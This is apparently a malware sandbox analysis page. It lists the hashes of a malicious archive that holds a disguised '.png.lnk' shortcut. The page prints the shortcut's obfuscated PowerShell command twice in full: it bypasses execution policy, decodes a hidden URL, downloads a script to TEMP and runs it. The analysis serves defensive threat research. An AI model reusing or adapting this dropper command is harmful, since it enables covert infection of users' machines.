Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
c1bc476409fcd391a809e11113fda140
Sha1
968dfdfe02e1b20d4f86ef147f597ffaf49ce115
Sha256
2bcf9244e88fbc1524df7c3261af70262af58a1bf2a8d1df50a8dce63f0a31be
Sha384
71092f1642d9e8eb49451909f0312834276915e53b0b4032b49db621873e2e7328b2bff22c6a66390bcd4c064ad5486c
Sha512
45b592a00e753baf3b4e9c3866f29b3b59ad288a0bfa8282b80810dbe5b95c95468fd9dead19c1e34c418ff30699446ad3ccd9b9f4104ec776895fcce04175d3
SSDeep
384:zG9uWcwITsRxD7USm0oDwnJeN9MUF66zi29h1peG72CSVhQpDmQVp:IITuxPmXEJQ9MUF66x1pLyhpQVp
TLSH
FC62C0BF61062111C90B0E2C60E9EB298CFC74AF77BDD855E24541ED1ABF8AF070584D
File Structure
c1bc476409fcd391a809e11113fda140
Malicious
MP-447232026.mp4
IMG-271500734.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$c=[bigint]\"3645341573120305356403486351237255\";$j=[bigint]\"1385878664031123131040806105037599\";$e=$c - $j;while($e -ne 0){$g+=[char]([int]($e -band 0xFF));$e=$e -shr 8};iwr $g -OutFile $env:TEMP\0MdBi7.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\0MdBi7.ps1"
c1bc476409fcd391a809e11113fda140 (15.75 KB)
File Structure
c1bc476409fcd391a809e11113fda140
Malicious
MP-447232026.mp4
IMG-271500734.png.lnk
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$c=[bigint]\"3645341573120305356403486351237255\";$j=[bigint]\"1385878664031123131040806105037599\";$e=$c - $j;while($e -ne 0){$g+=[char]([int]($e -band 0xFF));$e=$e -shr 8};iwr $g -OutFile $env:TEMP\0MdBi7.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\0MdBi7.ps1"

Malicious

c1bc476409fcd391a809e11113fda140 > IMG-271500734.png.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙